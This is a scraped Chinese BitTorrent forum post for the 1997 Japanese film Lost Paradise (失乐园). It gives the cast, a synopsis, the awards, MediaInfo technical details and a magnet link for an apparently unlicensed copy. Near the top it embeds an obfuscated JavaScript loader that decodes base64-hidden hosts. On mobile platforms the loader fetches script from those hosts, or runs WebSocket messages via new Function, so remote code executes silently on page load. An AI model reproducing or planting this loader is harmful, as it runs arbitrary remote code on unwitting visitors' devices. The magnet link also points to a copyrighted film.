失乐园[简繁字幕].Lost.Paradise.1997.1080p.FriDay.WEB-DL.H264.AAC 2.87GB

版主小s 1月前 1269

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 失乐园 / Shitsurakuen / Lost Paradise
◎片  名 失楽園
◎年  代 1997
◎产  地 日本
◎类  别 剧情 / 爱情 / 情色
◎语  言 日语
◎上映日期 1997-05-10(日本)
◎IMDb链接 https://www.imdb.com/title/tt0120120/
◎豆瓣评分 7.4/10 (31445人评价)
◎豆瓣链接 https://movie.douban.com/subject/1308567/
◎片  长 119分钟
◎导  演 森田芳光 Yoshimitsu Morita (id:1008276)
◎编  剧 筒井智美 Tomomi Tsutsui (id:1302779)
       渡边淳一 Junichi Watanabe   (id:1340074)
◎演  员 役所广司 K?ji Yakusho (id:1165478)
       黑木瞳 Hitomi Kuroki (id:1028490)
       寺尾聪 Akira Terao (id:1045788)
       柴俊夫 Toshio Shiba (id:1048815)
       星野知子 Tomoko Hoshino (id:1031552)
       木村佳乃 Yoshino Kimura (id:1000705)
       小坂一也 Kazuya Kosaka (id:1021640)
       速水典子 Noriko Hayami (id:1286262)
       原千晶 Chiaki Hara (id:1312679)
       村上淳 Jun Murakami (id:1023769)
       角川历彦 Tsuguhiko Kadokawa (id:1288011)
       原正人 Masato Hara (id:1286010)
       大岛满 Michiru Oshima (id:1275201)
       田中慎二 Shinji Tanaka (id:1298893)
       小泽秀高 Hidetaka Ozawa (id:1293767)
       堀口正树 Masaki Horiguchi (id:1354117)
       杉山泰一 Yasukazu Sugiyama (id:1354178)

◎标  签 日本 / 情色 / 日本电影 / 失乐园 / 黑木瞳 / 爱情 / 渡边淳一 / 森田芳光

◎简  介
  久木祥一郎(役所广司饰)是一家出版社的高级编辑,妻子久木文枝(星野知子饰)做设计陶制品,已成年的女儿在医院工作,很少回家。祥一朗感到家庭生活乏味,夫妻间总是客客气气。                                    
                                祥一郎有个情人,业余书法教师松原凛子(黑木瞳饰)。凛子气质高雅,是个聪慧女子。可惜嫁了个毫无情趣的医生丈夫松原晴彦。他冷冰冰的,导致二人婚姻空虚。一次他坚决地告诉凛子决不会和她离婚,他掌握有妻子偷情的证据,并揭发了事情。另一边文枝却默默承受,最终也只能离婚。冬季到来,祥一郎和凛子怎么才能永远的和对方长相厮守呢?

◎获奖情况 (共13项)
  第21届日本电影学院奖 (1998)
  最佳导演(提名)
   └──森田芳光 (id:1008276)
  最佳编剧(提名)
   └──筒井智美 (id:1302779)
  最佳女主角
   └──黑木瞳 (id:1028490)
  最佳男配角(提名)
   └──寺尾聪 (id:1045788)
  最佳女配角(提名)
   └──星野知子 (id:1031552)
  最佳配乐(提名)
   └──大岛满 (id:1275201)
  最佳摄影(提名)
   └──高濑比吕志 (id:1029672)
  最佳美术指导(提名)
   └──小泽秀高 (id:1293767)
  最佳照明(提名)
   └──小野晃 (id:1305005)
  最佳录音(提名)
   └──桥本文雄 (id:1286196)
  最佳剪辑(提名)
   └──田中慎二 (id:1298893)
  最佳新人
   └──木村佳乃 (id:1000705)

  第22届报知映画赏 (1997)
  最佳女主角
   └──黑木瞳 (id:1028490)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 58148704699345538270876876694009296796 (0x2BBF087D3991C2E4C17C7028EAF6379C)

  4. Complete name                            : [email protected].mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 2.87 GiB

  8. Duration                                 : 1 h 59 min

  9. Overall bit rate                         : 3 435 kb/s

  10. Encoded date                             : UTC 2021-08-15 03:40:32

  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : AVC

  16. Format/Info                              : Advanced Video Codec

  17. Format profile                           : [email protected]

  18. Format settings                          : CABAC / 4 Ref Frames

  19. Format settings, CABAC                   : Yes

  20. Format settings, Reference frames        : 4 frames

  21. Codec ID                                 : V_MPEG4/ISO/AVC

  22. Duration                                 : 1 h 59 min

  23. Bit rate mode                            : Constant

  24. Bit rate                                 : 3 307 kb/s

  25. Nominal bit rate                         : 4 000 kb/s

  26. Width                                    : 1 920 pixels

  27. Height                                   : 1 080 pixels

  28. Display aspect ratio                     : 16:9

  29. Frame rate mode                          : Constant

  30. Frame rate                               : 29.970 (30000/1001/53354) FPS

  31. Color space                              : YUV

  32. Chroma subsampling                       : 4:2:0

  33. Bit depth                                : 8 bits

  34. Scan type                                : Progressive

  35. Bits/(Pixel*Frame)                       : 0.053

  36. Stream size                              : 2.76 GiB (96%)

  37. Language                                 : English

  38. Default                                  : Yes

  39. Forced                                   : No


  40. Audio

  41. ID                                       : 2

  42. Format                                   : AAC LC

  43. Format/Info                              : Advanced Audio Codec Low Complexity

  44. Codec ID                                 : A_AAC-2

  45. Duration                                 : 1 h 59 min

  46. Bit rate                                 : 125 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 46.875 FPS (1024 SPF)

  51. Compression mode                         : Lossy

  52. Delay relative to video                  : 1 ms

  53. Stream size                              : 107 MiB (4%)

  54. Language                                 : Japanese

  55. Default                                  : Yes

  56. Forced                                   : No


  57. Text #1

  58. ID                                       : 3

  59. Format                                   : UTF-8

  60. Codec ID                                 : S_TEXT/UTF8

  61. Codec ID/Info                            : UTF-8 Plain Text

  62. Duration                                 : 1 h 54 min

  63. Bit rate                                 : 24 b/s

  64. Count of elements                        : 812

  65. Stream size                              : 20.8 KiB (0%)

  66. Title                                    : Chinese Simplified

  67. Language                                 : Chinese

  68. Default                                  : Yes

  69. Forced                                   : No


  70. Text #2

  71. ID                                       : 4

  72. Format                                   : UTF-8

  73. Codec ID                                 : S_TEXT/UTF8

  74. Codec ID/Info                            : UTF-8 Plain Text

  75. Duration                                 : 1 h 54 min

  76. Bit rate                                 : 24 b/s

  77. Count of elements                        : 812

  78. Stream size                              : 20.8 KiB (0%)

  79. Title                                    : Chinese Traditional

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No



TAGS 剧情 情色 爱情

磁力链:
  • magnet:?xt=urn:btih:CF1B15C424637383502448F15E68071F8DCC77C2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回